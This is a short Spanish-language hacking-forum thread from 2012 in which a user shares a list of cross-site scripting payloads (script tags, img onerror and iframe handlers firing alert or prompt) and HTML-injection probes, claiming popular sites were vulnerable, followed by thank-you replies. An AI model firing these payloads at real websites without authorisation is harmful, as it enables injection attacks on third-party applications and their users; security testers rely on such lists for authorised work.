Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Dedalo en Junio 30, 2012, 06:33:36 PM

Título: Vectores de Ataque Xss
Publicado por: Dedalo en Junio 30, 2012, 06:33:36 PM
Se que hay ya muchos Lists de vectores para Xss pero Les voy a pasar los que usé para algunos de mis mejores Xss:



"><script>alert(0)</script>
</title><script>alert(/SeguridadBlanca/)</script>
"/><script>alert(1);</script>
'"><script>alert(0);</script>
"><iframe onclick=alert(1)></iframe>
</textarea>"><script>prompt(1)</script>
"><img src=x onerror=prompt(1);>
//>'>"><img src=x onerror=prompt(1);>
"><img src=x onerror=alert(/SeguridadBlanca/);>



Como me gusta chrome el que mas uso para probar antes de mandarme a testear con el firefox para que salten uso:


"><h1>hols</h1>
"><marquee>sb</h1>
"/><img src=x />



Hasta los populares han caido con estos Vectores...



(https://p.twimg.com/AtIsW62CEAEdCCO.png:large)

(https://p.twimg.com/AsPaNCaCIAA8fhi.png:large)

(https://p.twimg.com/AuFvak3CIAEv1oY.png:large)

(https://p.twimg.com/AuCPD0XCAAAmRbr.png:large)

(https://p.twimg.com/AwqUFA6CIAA3RE3.png:large)

Saludos,
Dedalo
Título: Re:Vectores de Ataque Xss
Publicado por: Pr0ph3t en Junio 30, 2012, 06:35:27 PM
Buenisimo como siempre Dedalo, gracias ;) :P
Título: Re:Vectores de Ataque Xss
Publicado por: Anton en Agosto 10, 2013, 08:26:04 PM
Buenisimo :D Gracias por los vectores :)